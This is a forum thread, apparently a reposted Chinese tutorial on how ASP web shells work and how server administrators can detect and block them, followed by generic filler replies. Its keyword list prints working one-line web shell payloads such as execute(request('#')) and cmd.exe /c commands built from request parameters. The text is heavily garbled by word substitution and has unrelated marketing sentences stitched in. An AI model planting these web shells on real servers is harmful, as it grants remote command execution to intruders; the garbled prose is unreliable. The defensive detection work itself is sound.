仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 380|回复: 8
打印 上一主题 下一主题

[学习教程] ASP编程:ASP木马的道理和基础提防办法

[复制链接]
蒙在股里 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-16 23:15:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
对用户来说可预见费用、节约费用,可以做到花少钱办大事。由于省去了购买软件和硬件等的前期费用,用户可以租用较高级的应用软件。ASP的收费是根据软件的类型、客制化程度、用户数量、服务期限来定的,对客户来说这笔费用是可以预见的。方便于客户应用软件的升级。木马  ASP木马放肆,基于ASP的网站不时处于伤害当中,要让网站的平安随时失掉保证,必要我们的服务器办理员要做些甚么呢,怎样提防ASP木马呢?要提防ASP木马,那末我们就必要晓得它的运转道理和机制,上面我们看一段代码:

Setoscript=Server.CreateObject("Wscript.SHELL")"创建了一个名为oscript的Wscript.SHELL工具,用于命令的实行"
SetoscriptNet=Server.CreateObject("Wscript.NETWORK")
SetoFileSys=Server.CreateObject("scripting.FileSystemObject") 

  下面三行代码创立了Wscript.SHELL、Wscript.NETWORK、scripting.FileSystemObject三个工具我们能够看出asp木马的运转道理就是经由过程挪用组件工具等完成的。

  经由过程剖析一些asp木马,我们看出次要是经由过程3个组件运转的,第一个是我们都晓得的FSO,必要FSO撑持也就是"scripting.FileSystemObject"项的撑持,那末有人会说,是否是删除这个组件就能够了呀,不成以的,由于如今良多程序都是要用到FSO这个组件的,以是是以为不克不及限定的,否则一般的程序也运转不了,如今网上有良多教程,告知他人删除或限定利用,这些办法都很极度,我不保举人人利用,我们再说别的几个组件"shell.application"、"Wscript.SHELL"等伤害组件,一样平常的木马都是要利用这几个组件的,即便你把fso组件限定的话,你不往限定其余组件的的话,一样不克不及起到效果的,关于fso组件以外的其他的几个组件,我们平常是不太用的,以是我们能够间接在注册表中的HKEY_CLASSES_ROOT中找到

  找到"shell.application"、"Wscript.SHELL"等伤害的剧本工具(由于它们都是用于创立剧本命令通道的)举行更名或删除,也就是限定体系对“剧本SHELL”的创立,ASP木马也就成为无本之木、无米之炊,运转不起来了。假如我们本人要利用的话,那末我们就不要删除间接改下名字,假如是更名,要改得庞大一点,不要让他人猜到了,我们在要用的程序内里间接把挪用的名字改成我们方才修正的名字就能够了。

  对组件举行限定以后,我们还应当对服务器的权限举行严厉的设置,这里我就不说了,因为篇幅成绩,等下不晓得要写多久了,人人能够参考网上的一些平安权限设置,我们对权限和组件等等设置完了以后,基础上就可以避免asp木马的伤害了。

  别的有一点应当注重,假如的确发明木马了,查杀完以后,应当将具有办理权限的各种帐号都举行修正。包含论坛的帐号、数据库帐号和服务器操纵体系帐号、FTP帐号等,假如我们做到了这个几点话,我们的服务器基础上是平安了,呵呵,为何说是基础的呢,由于这个天下上基本就没有平安的服务器了,只不外我们方才说到的设置只是可以提防年夜部分asp木马的的损害,不扫除一些其余要素,好比说提限。说白了提防asp木马就是要限定组件,设置严厉的权限和包管asp程序的平安

  我们上面说下怎样查杀asp木马了,我依据本人的一些履历说几种办法

  1.工夫对照法

  定时间按次找到比来被修改的asp文件,翻开看下,是否是木马呢,甚么,看不懂代码,那你就把不是你本人放的asp文件,名字看一眼就看的出的。好比说diy.ap.dm6.asp,angel.asp.shell.asp甚么的文件,可疑的asp文件不是你本人创立的删除,或间接会见下看下是否是木马就能够了

  2.查找关头字,asp木马都是有关头字的,也就像病毒的特性码,我们用windows自带的搜刮功效就可以查找到,查找包括内容为关头字的一切文件就能够了,找到今后看下就能够了,偶然候能查找到一些asp的年夜文件,假如是假造主机的话,通常为数据库文件改成asp的了,假如是一句话木马的关头字就当心了,假如是年夜型木马的关头字,我们会见一下看看,我不同意把数据库改成asp的,至于为何,人人都晓得吧。

  我收拾了一些特性码,如今给人人

gxgl
lcx
<scriptRUNAT=SERVERLANGUAGE=JAVAscript>eval(Request.form(’#’)+’’)</script>

输出马的内容

session("b")

request("kker")

十分遗憾,您的主机不撑持ADODB.Stream,不克不及利用本程序

传至服务器已有假造目次

告诫:对不法利用此程序大概带来的任何不良成果义务自信!请勿用于不法用处!!!

<%executerequest("value")%>

ccopus

<%execute(request("#"))%>

<scriptlanguage="vbscript"runat=server>ifreques(#")""thenexecute(request("#"))</script>

("cmd.exe/c"&request.form("cmd")).

("cmd.exe/c"&request("cmd")).

("cmd.exe/c"&request("c")).
  这些都是关头字了,全体是我从木马内里一个一个提掏出来的,假如有这些特性的话,一样平常都是木马,不外人人最好翻开看一下,不扫除特别情形。假如你的网站里,有相似代码:<iframesrc="http://www.***.com"></iframe>估量多是被到场的歹意毗连,或着被挂马了,好恶毒,那末请在关头词中搜刮iframesrc,

  3.人人也能够用明小子的asp木马扫描的这个小工具拉,把我的关头字放出来,扫描一下,挺便利的,呵呵

  4.在网站布局分明的情形下,扫瞄目次法能疾速断定木马,在不应呈现的中央呈现的文件,管他是否是木马都能够删,好比说dvbbs下的upfile这些文件夹里是不该该呈现asp文件的,我们一发明就删除就是了,不外请求办理员对本人的网站目次布局熟

  5.有一种办法能够试下,就是做好备份,一旦发明有人进侵,即刻复原,如许甚么木马也不怕了,不外要注重的是,把包管备份文件是平安的,如果备份文件里也有木马,让就没弄一样的

  6.用asp木马追捕的文件,查杀,网上有下载的,别的我们经常使用的杀毒软件也有如许的功效,我保举人人接纳卡巴斯机,效果十分好,几近能查杀现在一切盛行的asp木马

  下面只是复杂的先容了一下,asp木马的一些查杀办法,固然这些只是亡养补牢了,我们最好对服务器体系举行严厉的权限限定,让黑客即便是上传了木马也没有甚么用,这里权限的限定我就未几说了等下不晓得要写几,网上的材料也很周全的,人人能够本人往查找西。并且如今说来讲往,asp木马的埋没办法的确是很拙劣,asp木马代码加密,图片兼并,文件工夫修正,另有要命的体系毛病使用等等这关于要百分之百查杀asp木马的查杀,几近不成能,我们只要堵住木即刻传的泉源,asp程序只管用最新版本,网站中的上传路子本人应当出格注重,关于不必要剧本运转的文件夹在iis内里设置,实行允许为无,另有就是办理员请求有优秀的平安认识,否则的话,谈不上平安了,而且我们设置了权限以后,传了也是白传。</p>减少客户内IT专业人才缺乏带来的影响。ASP的客户员工利用浏览器进入相关的应用软件,简单易用,无需专业技术支持。
老尸 该用户已被删除
沙发
发表于 2015-1-20 08:42:05 | 只看该作者
Response:从字面上讲是“响应”,因此这个是服务端向客户端发送东西的,例如Response.Write
若相依 该用户已被删除
板凳
发表于 2015-1-26 22:01:07 | 只看该作者
作为IE上广为流传的动态网页开发技术,ASP以它简单易学博得了广大WEB程序爱好这的青睐,而且它对运行环境和开发品台的不挑剔,以及有大量有效的参考手册,极大的推广了它的发展。
变相怪杰 该用户已被删除
地板
发表于 2015-2-4 20:47:15 | 只看该作者
封装性使得代码逻辑清晰,易于管理,并且应用到ASP.Net上就可以使业务逻辑和Html页面分离,这样无论页面原型如何改变,业务逻辑代码都不必做任何改动;继承性和多态性使得代码的可重用性大大提高。
莫相离 该用户已被删除
5#
发表于 2015-2-10 08:28:29 | 只看该作者
ASP.Net摆脱了以前ASP使用脚本语言来编程的缺点,理论上可以使用任何编程语言包括C++,VB,JS等等,当然,最合适的编程语言还是MS为.NetFrmaework专门推出的C(读csharp),它可以看作是VC和Java的混合体吧。
柔情似水 该用户已被删除
6#
发表于 2015-3-1 05:12:59 | 只看该作者
最近在学asp,不要问我为什么不直接学.net,因为公司网站是asp做的所以有这个需要,卖了本书asp入门到精通,对里面的六大内置对象老是记不住,还有很多属性和方法看的头晕。
飘灵儿 该用户已被删除
7#
发表于 2015-3-10 12:49:23 | 只看该作者
代码逻辑混乱,难于管理:由于ASP是脚本语言混合html编程,所以你很难看清代码的逻辑关系,并且随着程序的复杂性增加,使得代码的管理十分困难,甚至超出一个程序员所能达到的管理能力,从而造成出错或这样那样的问题。
小妖女 该用户已被删除
8#
发表于 2015-3-17 07:10:16 | 只看该作者
最近在学asp,不要问我为什么不直接学.net,因为公司网站是asp做的所以有这个需要,卖了本书asp入门到精通,对里面的六大内置对象老是记不住,还有很多属性和方法看的头晕。
乐观 该用户已被删除
9#
发表于 2015-3-24 01:43:34 | 只看该作者
如何学好ASP,以前也有人问过,把回答给你转过来看看能否对你有帮助:
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-23 23:54

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表